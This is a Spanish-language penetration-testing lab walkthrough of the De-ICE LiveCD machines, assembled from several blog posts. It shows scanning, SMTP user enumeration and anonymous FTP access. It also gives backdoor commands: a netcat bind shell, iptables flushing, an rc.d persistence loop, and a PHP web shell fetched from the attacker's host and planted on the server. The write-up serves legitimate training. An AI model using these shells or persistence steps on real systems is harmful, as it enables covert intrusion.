550 5.1.1 thomasp… User unknown
550 5.1.1 markt… User unknown
550 5.1.1 sarahg… User unknown
550 5.1.1 jacobm… User unknown
550 5.1.1 ebenezers… User unknown
550 5.1.1 bobc… User unknown
550 5.1.1 bills… User unknown
550 5.1.1 jackd… User unknown
created by Roguer
jollyroguer @ gmail.com

Para quienes represente algún inconveniente ejecutar el script en python, también existe otra herramienta escrita en C que me ha resultado bastante efectiva a la hora de realizar enumeración de usuarios a través del servicio SMTP con RCPT. Veamos:

SMTP (RCPT TO) User enumeration

Una ves descargado/copiado como rcpt2.c (foo.c) y editado el código según nuestras necesidades, procedemos a compilarlo para generar el binario.

Edición:

Solo necesité editar las siguientes lineas (negrita):

define PORT            25
#define BUFFSIZE        2048
#define NAME            “rcpt2″
#define HELO            “HELO Sec-Track\n”
#define MAIL            “mail from:<sectrack@slax.example.net>\n”
#define RCPT2           “rcpt to: “

Compilación:

root@bt:~# gcc rcpt2.c -o user_enumeration

Ejecución:

root@bt:~# ./user_enumeration
rcpt2 by B-r00t. (c) 2003.
Usage:  ./user_enumeration <USERLIST> <HOST>
./user_enumeration usernames.txt smtp.acme.com

Resultados:

root@bt:~# ./user_enumeration users.txt 192.168.2.100
rcpt2 by B-r00t. (c) 2003.
Usernames from: users.txt
RCPT TO username enumeration on 192.168.2.100.

BANNER: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Fri, 12 Mar 2010 11:35:30 GMT
SEND: HELO avatar
RECV: 250 slax.example.net Hello [192.168.2.1], pleased to meet you
2010 11:35:30 GMT

SENT: mail from:<avatar@slax.example.net>
RECV: 250 2.1.0 <avatar@slax.example.net>… Sender ok

VALID_USER: root
VALID_USER: havisham
VALID_USER: magwitch
VALID_USER: pirrip

Sending RSET & QUIT to 192.168.2.100

Ok Done!

Como se puede ver logramos obtener algunos de los usuarios del sistema. Estos son:

• root
• havisham
• magwitch
• pirrip

En el próximo post evaluaremos la posibilidad de autenticarnos con estos usuarios en los servicios disponibles (brute force, contraseñas débiles, etc). También trataremos de identificar vulnerabilidades en el sistema que nos permitan determinar posibles puntos de intrusión.

Objetivos Generales para los entornos De-Ice I, II, III y PwnOS

También es necesario describir nuevamente el escenario propuesto para este Test de Penetración:

De-ICE PenTest LiveCDs (Nivel III)

El procedimiento de implementación de este entorno no varía mucho con respecto a los anteriores. Tan solo cambia la red objetivo, que para esta ocasión será la 192.168.2.*

Identifiquemos los host vivos (conectados) en la red (Tool: Netdiscover incluída en BackTrack):

root@bt:~# netdiscover eth0

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:07    01    060   Unknown vendor
 192.168.2.100   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 192.168.2.101   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 Currently scanning: 192.168.9.0/16   |   Our Mac is: 00:0c:29:ac:c4:e0 - 0

Una vez hemos identificados los posibles host’s objetivos pasemos a escanearlos en detalle para obtener más información sobre estos.

Veamos este proceso con Nmap.

Escaneo y explicación enviada por Roguer (jollyroguer [at] gmail.com):

root@bt: ~#nmap -sP 192.168.2.1-255
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-25 23:35 UTC
Host 192.168.2.10 is up.
Host 192.168.2.100 is up (0.00066s latency).
MAC Address: 00:0C:29:78:57:AE (VMware)
Host 192.168.2.101 is up (0.00066s latency).
MAC Address: 00:0C:29:78:57:AE (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.06 seconds

En donde obtengo que hay 3 equipos arriba, de los cuales el .10 es mi máquina y los 100 y 101 objetivos enseguida nos centraremos en el equipo .100

Arranco haciendo un escaneo de puertos, como es un entorno seguro no hay necesidad de ocultar la ip de origen

root@bt: ~#nmap -sV -T Aggressive -O 192.168.2.100
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-25 23:36 UTC
Interesting ports on 192.168.2.100:
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd 2.0.4
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 00:0C:29:78:57:AE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 – 2.6.24
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix
OS and Service detection performed. Please report any incorrect
results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

Como podemos ver hay varios servicios corriendo en este equipo, así que vamos a tratar de obternet información como en los entornos anteriores.

——————————————————————————————–

Realicemos un escaneo para identificar servicios y versiones en el host 192.168.2.101

root@bt:~# nmap -PT80 192.168.2.101

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:09 COT
Interesting ports on 192.168.2.101:
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:0C:B9:E5 (VMware)

root@bt:~# nmap -sV -p 80 192.168.2.101

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:12 COT
Interesting ports on 192.168.2.101:
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
MAC Address: 00:0C:29:0C:B9:E5 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

Perfecto el proceso de mapeo de red e identificación de aplicaciones y servicios en los host objetivos. En el próximo post centraremos nuestra atención a las actvidades relacionadas con la enumeración del objetivo e identificación de posibles puntos de intrusión.

Ya hemos realizado varios escaneos al sistema y hemos identificado los servicios que se ejecutan en este. Pasemos ahora a recolectar información sensible del sistema o de interés para posibles ataques.

Se hace necesario realizar varios tipos de test; entre ellos un escaneo de directorios y archivos (árbol de directorios del aplicativo web), pruebas de conexión a los diferentes servicios, etc. Todos estos procedimientos son detallados en las metodologías ISSAF y OSSTMM.

Si observamos la página web del sistema objetivo, esta nos ofrece información sobre la finalidad del sistema y de las personas/usuarios que administran/utilizan el servidor. Estos son:

Sr. System Admin: Adam Adams – adamsa@herot.net
System Admin (Intern): Bob Banter – banterb@herot.net
System Admin: Chad Coffee – coffeec@herot.net

Muy posiblemente los usuarios válidos en el sistema sean:

• adamsa
• banterb
• coffeec

Y estos nos sirvan para llevar a cabo un ataque de autenticación a los servicios que actualmente ofrece (FTP, SSH)

Aun así y con el objetivo de recolectar más información realicemos un escaneo de directorios y vulnerabilidades web con la herramienta nikto.

root@bt:/pentest/web/nikto# perl nikto.pl -h http://192.168.1.110

- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.1.110
+ Target Hostname:    192.168.1.110
+ Target Port:        80
+ Start Time:         2010-01-22 20:49:26
—————————————————————————
+ Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2
+ OSVDB-0: mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-0: Apache/2.2.4 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: mod_ssl/2.2.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-0: OpenSSL/0.9.8b appears to be outdated (current is at least 0.9.8i) (may depend on server version)
+ 3588 items checked: 6 item(s) reported on remote host
+ End Time:           2010-01-22 20:50:02 (36 seconds)
—————————————————————————
+ 1 host(s) tested

Pasemos ahora a explorar el código fuente del sitio Web con el objetivo de buscar información oculta. Para ello realizaremos una descarga de todo el Website con la herramienta WGet.

root@bt:~/Sec-Track/De-Ice_II# wget -r http://192.168.1.110

–2010-01-21 21:02:52–  http://192.168.1.110/
Connecting to 192.168.1.110:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2036 (2.0K) [text/html]
Saving to: `192.168.1.110/index.html’

100%[======================================>] 2,036       –.-K/s   in 0s

2010-01-21 21:02:52 (103 MB/s) – `192.168.1.110/index.html’ saved [2036/2036]

Loading robots.txt; please ignore errors.
–2010-01-21 21:02:52–  http://192.168.1.110/robots.txt
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 404 Not Found
2010-01-21 21:02:52 ERROR 404: Not Found.

–2010-01-21 21:02:52–  http://192.168.1.110/level.html
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 200 OK
Length: 2309 (2.3K) [text/html]
Saving to: `192.168.1.110/level.html’

100%[======================================>] 2,309       –.-K/s   in 0s

2010-01-21 21:02:52 (157 MB/s) – `192.168.1.110/level.html’ saved [2309/2309]

–2010-01-21 21:02:52–  http://192.168.1.110/copyright.txt
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 200 OK
Length: 15719 (15K) [text/plain]
Saving to: `192.168.1.110/copyright.txt’

100%[======================================>] 15,719      –.-K/s   in 0s

2010-01-21 21:02:52 (177 MB/s) – `192.168.1.110/copyright.txt’ saved [15719/15719]

–2010-01-21 21:02:52–  http://192.168.1.110/index2.html
Reusing existing connection to 192.168.1.110:80.
HTTP request sent, awaiting response… 200 OK
Length: 847 [text/html]
Saving to: `192.168.1.110/index2.html’

100%[======================================>] 847         –.-K/s   in 0.001s

2010-01-21 21:02:52 (968 KB/s) – `192.168.1.110/index2.html’ saved [847/847]

FINISHED –2010-01-21 21:02:52–
Downloaded: 4 files, 20K in 0.001s (20.5 MB/s)

Luego de analizar los archivos descargados pudimos darnos cuenta que no existe ninguna información de relevancia para el Test de Penetración. Lo que si pudimos encontrar fue un archivo (level.html) con información relacionada con el entorno De-Ice LiveCD II:

<B><I>The disk is considered Level 1</I></B>, and minimal penetration skills are required in order to exploit this disk.  Additional skills required to complete this challenge is a more-than-basic understanding of unix commands and basic functionality of the unix OS.  All tools needed to exploit this disk can be found on the BackTrack Penetration LiveCD (version 2) found at Remote-Exploit.org.  No additional downloads or disks are needed.
<BR><BR>
<B>Minimum time required to penetrate this CD is:  30 Minutes (approx.)</B><BR>
This time is only possible if you know exactly what to do, and in what order.  Do not get frustrated if penetration of this system exceeds hours, or even days.
This exercise is intended to provide a real-world simulation of a penetration test task.  Sometimes, banging your head IS the answer… so bang away.  >;-)

etc….

En la fase anterior no pudimos identificar el banner del servicio que se ejecutaba en el puerto 22 (SSH) con nmap, para esto simplemente ejecuto la herramienta Netcat:

root@bt:~# nc 192.168.1.110 22

SSH-1.99-OpenSSH_4.3

Además de esto vamos a realizar un escaneo de vulnerabilidades con la herramienta Nessus.

Para ello voy a deshabilitar todos los plugins que vienen activos por defecto, pues solo vamos a requerir algunos que están relacionados con los puertos y servicios que identificamos en la primera fase del Test de Penetración.

Brute Force Attacks

• Hydra FTP
• Hydra SSH2

FTP

• Anonymous FTP Enabled
• Anonymous FTP Writeable root Directory
• FTP Privileged Port Bounce Scan
• FTP Server Any Command Accepted (Possible Backdoor Proxy)
• FTP Server Bad Command Sequence Accepted (Possible Backdoor Proxy)
• FTP Server Copyrighted Material Present
• FTP Server No Command Accepted (Possible Backdoor Proxy)
• Etc…

Finger Abuses

• Finger .@host Unused Account Disclosure
• Finger 0@host Unused Account Disclosure
• Finger Service Remote Information Disclosure
• Etc…

General

• Enumerate
• OS Identification
• OS Identification FTP
• OS Identification HTTP
• OS Identification ICMP
• OS Identification Linux Distribution
• OS Identification SSH

Web Servers

• Apache
• PHP
• Etc…

Gain a Shell Remotely

• OpenSSH
• OpenSSL
• Shell Command Execution Vulnerability
• Etc…

Entre otras…

Como vemos este escaneo está configurado de manera muy general, y enfocado únicamente a los servicios  encontrados con Nmap. Por ello solo encontramos las siguientes Alertas de Seguridad en el resultado de Nessus.

Nessus Report
The Nessus Security Scanner was used to assess the security of 1 host

• 2 security warnings have been found
• 1 security note has been found

List of open ports :

• ssh (22/tcp)
• ipp (631/tcp)
• http (80/tcp)
• ftp (21/tcp)  (Security warnings found

Warning found on port ftp (21/tcp)
Synopsis :

Anonymous logins are allowed on the remote FTP server.
Description :

This FTP service allows anonymous logins. Any remote user may connect and authenticate without providing a password or unique credentials. This allows a user to access any files made available on the FTP server.

Solution :

Disable anonymous FTP if it is not required. Routinely check the FTP server to ensure sensitive content is not available.

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVE : CVE-1999-0497
Other references : OSVDB:69
Nessus ID : 10079

————————————————————————————————————————

Warning found on port ftp (21/tcp)
Synopsis :

The remote FTP server contains world-writable directories.

Description :

By crawling through the remote FTP server, Nessus discovered several directories were marked as being world-writable.

This could have several negative impacts:

* Temporary file uploads are sometimes immediately available to all anonymous users, allowing the FTP server to be used as a ‘drop’ point. This may faciliate trading copyrighted, pornographic or questionable material.

* A user may be able to upload large files that consume disk space, resulting in a denial of service condition.

* A user can upload a malicious program. If an administrator routinely checks the ‘incoming’ directory, they may load a document or run a program that exploits a vulnerability in client software.

Solution :

Configure the remote FTP directories so that they are not world-writable.

Risk factor :

Medium / CVSS Base Score : 6.4
(CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P)

Other references : OSVDB:76
Nessus ID : 19782

————————————————————————————————————————

Information found on port ftp (21/tcp)
Synopsis :

The remote FTP server allows credentials to be transmitted in clear text.

Description :

The remote FTP does not encrypt its data and control connections. The user name and password are transmitted in clear text and may be intercepted by a network sniffer, or a man-in-the-middle attack.

Solution :

Switch to SFTP (part of the SSH suite) or FTPS (FTP over SSL/TLS). In the latter case, configure the server such as data and control connections must be encrypted.

Risk factor :

Low / CVSS Base Score : 2.6
(CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Nessus ID : 34324)

————————————————————————————————————————

Finalmente comprobamos manualmente este acceso al servidor FTP que permite login anónimo.

root@bt:~/Sec-Track/De-Ice_II/192.168.1.110# ftp 192.168.1.110

Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

En la próxima fase (post) llevaremos a cabo una primera exploración dentro del servidor FTP en busca de información sensible que nos permita elevar privilegios en el sistema objetivo. En caso de no encontrar nada relevante procederemos a intentar un login por medio del servidor SSH.

La finalidad de usar sistemas backdoors (puertas traseras) es mantener un acceso al sistema de manera oculta al administrador del sistema, los cuales permitirán una entrada luego de un reinicio del sistema o ciertas condiciones a la que se someta el sistema sin necesidad de penetrar nuevamente el sistema.

El tema de backdoors en sistemas es más un arte que una técnica, ya que esta obliga al PenTester a usar toda su creatividad e imaginación para lograr su objetivo de conseguir un acceso en cualquier momento al sistema sin ser descubierto.

Solo mostraré algunos métodos para crear puertas traseras con la herramienta Netcat y otro con el servicio de publicación en Web (PHP), con la finalidad de que los lectores se animen y publiquen los métodos que conozcan y nos vayamos preparando para los entornos que vienen.

Ya hemos hablado anteriormente de Netcat (Video Tutorial Netcat en BackTrack), ahora aprovechemos el entorno disponible para practicar los aprendido.

Para nuestra fortuna, en el entorno De-Ice I netcat se encuentra disponible en dicho sistema, por lo tanto solo necesitamos dejarlo a la escucha.

Antes de ello es necesario verificar como se encuentra configurado el sistema de IPTABLES con la finalidad de analizar como se realizan las conexiones al sistema (conexiones permitidas, conexiones denegadas, etc)

root@slax:/# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  –  anywhere             anywhere
ACCEPT     udp  –  anywhere             anywhere            udp dpt:domain
ACCEPT     udp  –  anywhere             anywhere            udp spt:domain
ACCEPT     all  –  anywhere             anywhere            state RELATED,ESTAB                                              LISHED
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ftp-data
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ftp
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ssh
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:smtp
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:http
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:pop3
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:imap
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:https
LOG_DROP   all  –  anywhere             anywhere

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
LOG_DROP   all  –  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  –  anywhere             anywhere

Chain LOG_DROP (2 references)
target     prot opt source               destination
DROP       all  –  anywhere             anywhere

Si quisieramos tirar abajo todas las reglas (no recomendado para el objetivo de pasar desapercibido) solo basta con ejecutar la siguiente instrucción.

root@slax:/# iptables -F

La idea es que los lectores propongan una de las muchas maneras de agregar esta conexión a las reglas de IPTABLES sin tirar las demás abajo (Más información sobre IPTABLES y su configuración/edición)

Luego de esta “limpieza” de reglas vemos como quitamos la negación a peticiones ICMP que observamos al comienzo de la prueba.

S3cTr4cK@0100100-0100100 ~
$ ping 192.168.1.100

Pinging 192.168.1.100 with 32 bytes of data:

Reply from 192.168.1.100: bytes=32 time=1ms TTL=64
Reply from 192.168.1.100: bytes=32 time=1ms TTL=64

Ping statistics for 192.168.1.100:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 1ms, Average = 1ms

Ahora ejecutemos a netcat en modo escucha en el sistema objetivo (De-Ice I)

root@slax:/# nc -l -p 1337 -e /bin/bash

Si realizaramos un escaneo sencillo con nmap a varios puertos incluyendo el que dejamos a la escucha, encontraríamos los siguientes:

C:\Program Files\Nmap>nmap -p 22,25,80,443,1337 192.168.1.100

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-09 23:51 SA Pacific Standard T
Interesting ports on 192.168.1.100:
PORT     STATE  SERVICE
22/tcp   open   ssh
25/tcp   open   smtp
80/tcp   open   http
443/tcp  closed https
1337/tcp open   waste
MAC Address: 00:1A:73:90:81:0B (Gemtek Technology Co.)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

Ahora desde nuestro sistema cliente (atacante) solo basta conectarnos al puerto que dejamos a la escucha (1337) y ejecutar algunos comandos:

C:\Documents and Settings\S3cTr4cK\My Documents\Descargas\nc>nc 192.168.1.100 1337
whoami
root
pwd
/
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:43:03:6B
inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe43:36b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:6377 errors:0 dropped:0 overruns:0 frame:0
TX packets:1365 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:438725 (428.4 KiB)  TX bytes:169876 (165.8 KiB)
Interrupt:5 Base address:0×2000

lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:176 errors:0 dropped:0 overruns:0 frame:0
TX packets:176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15878 (15.5 KiB)  TX bytes:15878 (15.5 KiB)

uname -a
Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 athlon-4 i386 GNU/Linux

Ahora bien… ¿Qué pasaría si quisieramos que dicha instrucción se ejecutara al inicio del sistema objetivo?

Solo basta automatizar dicho inicio alojando la instrucción (script) en el directorio /etc/rc.d

Veamos el contenido de este directorio y un ejemplo de script para dicho propósito:

Contenido:

root@slax:/etc/rc.d# ls
rc.0         rc.alsa      rc.inet1       rc.nfsd        rc.sshd
rc.4         rc.bind      rc.inet1.conf  rc.pcmcia      rc.syslog
rc.6         rc.cups      rc.inet2       rc.portmap     rc.sysvinit
rc.FireWall  rc.firewall  rc.inetd       rc.saslauthd   rc.udev
rc.K         rc.font.new  rc.ip_forward  rc.sendmail    rc.vsftpd
rc.M         rc.gpm       rc.local       rc.serial      rc.wireless
rc.S         rc.hotplug   rc.modules     rc.slax        rc.wireless.conf
rc.acpid     rc.httpd     rc.mysqld      rc.slaxconfig

Hagamos entonces lo mismo para Netcat

Script:

root@slax:/etc/rc.d# vi rc.netcat1
#!/bin/sh
mkdir /tmp/netcat
while true ; do
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash
done

Y quedaría así:

root@slax:/etc/rc.d# more rc.netcat1
#!/bin/sh
mkdir /tmp/netcat
while true ; do
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash
done

Otra buena opción sería utilizar a Netcat en modo reverse shell, que también ha sido tratado en el video tutorial citado anteriormente.

El tercer método para habilitar una puerta tracera en el sistema de manera más “discreta” puede ser el uso del servidor web en la máquina objetivo, veamos:

Para ello haremos uso de una shell en el leguaje del lado del servidor PHP.

Primero debemos descargarla y transferirla a la máquina objetivo.

Para la transferencia he habilitado un server en mi máquina, solo basta realizar la petición con wget:

root@slax:~/Desktop# wget http://192.168.1.3/shellphp.txt
–00:34:53–  http://192.168.1.3/shellphp.txt
=> `shellphp.txt’
Connecting to 192.168.1.3:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 63,743 (62K) [text/plain]

100%[====================================>] 63,743        –.–K/s

00:34:53 (64.06 MB/s) – `shellphp.txt’ saved [63743/63743]

root@slax:~/Desktop# ls
Home.desktop  System.desktop  shellphp.txt

root@slax:~/Desktop# cp shellphp.txt /var/www/htdocs/infosys.php

Luego solo bastaría con ingresar en cualquier momento a dicha URL, para mi caso:

http://192.168.1.100/infosys.php

etc…

Vuelvo y reitero la invitación a que los lectores compartan sus métodos para habilitar puertas traseras en sistemas.

En futuros entornos conoceremos algunos métodos aún más avanzados que los presentados en este post realizado a modo de introducción a los Backdoors.

Se hace necesario realizar varios tipos de test; entre ellos un escaneo de directorios y archivos (árbol de directorios del aplicativo web), pruebas de conexión a los diferentes servicios, etc. Todos estos procedimientos son detallados en las metodologías ISSAF y OSSTMM.

Más importante aun es analizar en detalle el aplicativo web y la información que suministran. Para ello incluiré varios mensajes generados a través de la lista de discusión del Proyecto Sec-Track.

Fernando Quintero:

En la página aparecen los nombres y apellidos de personas, algo importante a identificar es que existe un patrón de creación de cuentas de correo, que consite en el apellido y la primera letra del nombre, esto en un caso real nos da la posibilidad de generar una lista de posibles usuarios a  fuerza bruta, buscando en un directorio nacional los apellidos mas comunes y luego haciendo fuerza bruta con la primera letra de los nombres de usuario:

sanchez
cortes
pelaez
murcia
etc,

Luego se combinarían con letras como a, b, c, d, e, f, g, produciendo:

sancheza
sanchezb
sanchezc
murciad XD

Hay algo interesante y es que varios usuarios aparecen con el título de sysadmins, lo que nos hace pensar que son los encargados de la red, y si pensamos en cual es la forma de mantener un servidor web que esta en un hosting, sabemos que debemos usar protocolos de transferencia de archivos, como ftp, scp, sftp, etc. De ahí concluimos que estos usuarios sysadmins deben tener acceso a estos servicios, creo que esta es la deducción que se hace para poder intentar un ataque de fuerza bruta con los usuarios.

Si se logra entrar a la máquina con un usuario sysadmin, podemos pensar en que ese usuario tiene alguna forma de escalar privilegios para poder administrar el sistema, entonces sería un objetivo primario.

Se observa que el servicio FTP esta cerrado, por alguna razón, o no está cerrado, esta filtrado, esto nos lleva a pensar que hay algo que se puede transferir por ftp, pero no es tan fácil hacerlo, porque existe algun método de protección, pero es la pista para  que unavez estemos adentro buscar cosas relacionadas con el FTP.

Yo sugerí que además de esto podría generarse dicho listado de usuarios realizando combinaciones de primera/s letras de nombre con apellido. Por lo tanto obtendríamos un listado bastante amplio de usuarios. Por ejemplo (primera letra de nombre+apellido / primeras dos letras de nombre+apellido / nombre / apellido:

admin
adam
adams
adamsa
bob
banter
banterb
chad
coffee
coffeec
aadams
bbanter
ccoffee
adadams
bobanter
chcoffee
etc…

Continúo sugiriendo lo siguiente:

Si obtamos en este momento por un ataque de fuerza bruta a alguno de  los servicios disponibles (por ejemplo ssh) nos arriesgamos a ocupar un periodo de tiempo considerable.

¿Cómo optimizar este tiempo?

Enumeración de usuarios por medio del servicio SMTP.

Este sería de la siguiente manera:

Usando el comando VRFY (No sirve)
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 7 Nov 2009
20:29:11 GMT
HELO
501 5.0.0 HELO requires domain address
HELO x
250 slax.example.net Hello [192.168.1.2], pleased to meet you
VRFY root
252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery (or try
finger)

—-

Usando el comando RCPT TO (Si sirve (Y))

220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 7 Nov 2009
20:34:53 GMT
HELO
501 5.0.0 HELO requires domain address
HELO x
250 slax.example.net Hello [192.168.1.2], pleased to meet you
MAIL FROM:r…@slax.example.net
250 2.1.0 r…@slax.example.net… Sender ok
RCPT TO:root
250 2.1.5 root… Recipient ok
RCPT TO:admin
550 5.1.1 admin… User unknown
RCPT TO:adam
550 5.1.1 adam… User unknown
RCPT TO:adams
550 5.1.1 adams… User unknown
RCPT TO:bob
550 5.1.1 bob… User unknown
RCPT TO:banter
550 5.1.1 banter… User unknown
RCPT TO:chad
550 5.1.1 chad… User unknown
RCPT TO:coffee
550 5.1.1 coffee… User unknown
RCPT TO:coffec
550 5.1.1 coffec… User unknown
RCPT TO:aadams
250 2.1.5 aadams… Recipient ok
RCPT TO:bbanter
250 2.1.5 bbanter… Recipient ok
RCPT TO:ccoffee
250 2.1.5 ccoffee… Recipient ok
RCPT TO:adadams
550 5.1.1 adadams… User unknown
RCPT TO:bobanter
550 5.1.1 bobanter… User unknown
RCPT TO:chcoffee
550 5.1.1 chcoffee… User unknown

De esta manera obtenemos exactamente los usuarios válidos en el  sistema y no ocupamos un tiempo exagerado tratando de autenticar un  usuario que no existe en el sistema.

Usuarios válidos:
root
aadams
bbanter
ccoffee

Una herramienta que puede automatizar este proceso de enumeración de usuarios por medio del servicio SMTP es la siguiente:

http://pentestmonkey.net/tools/smtp-user-enum/

Para realizar los ataques de fuerza bruta, pueden utilizar los siguientes recursos:

Laboratorios: Hacking – Técnicas y contramedidas – Ataques por fuerza bruta (Brute Force) VI

Laboratorios: Hacking – Técnicas y contramedidas – Ataques por fuerza bruta (Brute Force) V

Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking

Hasta aquí esta segunda parte… En el próximo post veremos el método de escalada de privilegios y recolección de información crítica en el sistema sugerida por Fernando Quintero.

En el siguiente video tutorial se muestra el proceso necesario para llevar a cabo la configuración de los entornos De-Ice sobre el software de virtualización VMWare WorkStation en GNU/Linux BackTrack.

Cabe resaltar que el producto VMWare se encuentra disponible de manera gratuita en su versión Server (previo registro y envío del serial), en modo Trial de 30 días en su versión WorkStation y de manera gratuita sin envío de serial en su versión Player.

Es importante para una correcta configuración tener muy claro los conceptos de interfaces de redes y como consultarlas y utilizarlas.

Configuración entornos De-Ice sobre GNU/Linux BackTrack from Sec-Track on Vimeo.

Este entorno hace parte del proyecto de Thomas Wilhelm De-ICE PenTest LiveCds (www.heorot.net) y será utilizado para brindar el primer acercamiento a los Test de Penetración.

Herramientas / Recursos: VMWare /Workstation /Server /Player, .ISO De-Ice Nivel I

Instalación De-Ice (Nivel I) en VMWare Workstation /Server from Sec-Track on Vimeo.